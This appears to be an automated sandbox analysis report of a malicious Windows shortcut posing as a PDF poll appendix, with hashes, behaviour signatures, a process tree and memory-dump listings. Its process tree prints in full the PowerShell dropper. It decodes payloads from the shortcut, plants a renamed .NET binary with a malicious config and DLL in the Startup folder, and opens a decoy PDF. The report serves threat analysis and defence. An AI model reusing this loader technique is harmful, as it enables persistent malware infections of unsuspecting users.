Overview

overview

10

Static

static

3

Key Data 2...2).xll

windows7-x64

7

Key Data 2...2).xll

windows10-2004-x64

10

Key Data 2...1).xll

windows7-x64

10

Key Data 2...1).xll

windows10-2004-x64

1

Quarterly ...df.lnk

windows7-x64

7

Quarterly ...df.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 14:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Quarterly Cambodia Poll Appendix.pdf.lnk

  • Size

    2.2MB

  • MD5

    23d55b0f6a502c7ed3a70d41272b0732

  • SHA1

    36a2c2cd63e3ca23a7934cfb3e7a957f2b5363f8

  • SHA256

    cfbd704cab3a8edd64f8bf89da7e352adf92bd187b3a7e4d0634a2dc764262b5

  • SHA512

    53984a522f5629f3bf64e62f9855254c74497388f0632e76b00fb16fba7b7fb45ffe2c0db7cd0e7016847f2a5d966e42b3081a47d6fc9a067c6bd0d9d9e752af

  • SSDEEP

    49152:zrdLymX/jNT7IBkZw3xFdyaxDadhCtbdMuC4vmYrl4GRGjEOaUJiuw:

Score
7/10

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Quarterly Cambodia Poll Appendix.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk').Directory).Name+'\'+'Quarterly Cambodia Poll Appendix.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Quarterly Cambodia Poll Appendix.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](2298152);$k.Seek(2953,[IO.SeekOrigin]::Begin);$k.Read($b,0,2298152);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::WriteAllBytes($env:temp+'\e.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\e.pdf');
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\e.pdf
        3⤵
          PID:2856
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3012

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2112-38-0x000007FEF5CDE000-0x000007FEF5CDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2112-40-0x0000000001FE0000-0x0000000001FE8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2112-39-0x000000001B630000-0x000000001B912000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2112-41-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-42-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-43-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-44-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-45-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-47-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2112-48-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/3012-49-0x0000000003D10000-0x0000000003D20000-memory.dmp

      Filesize

      64KB

      Download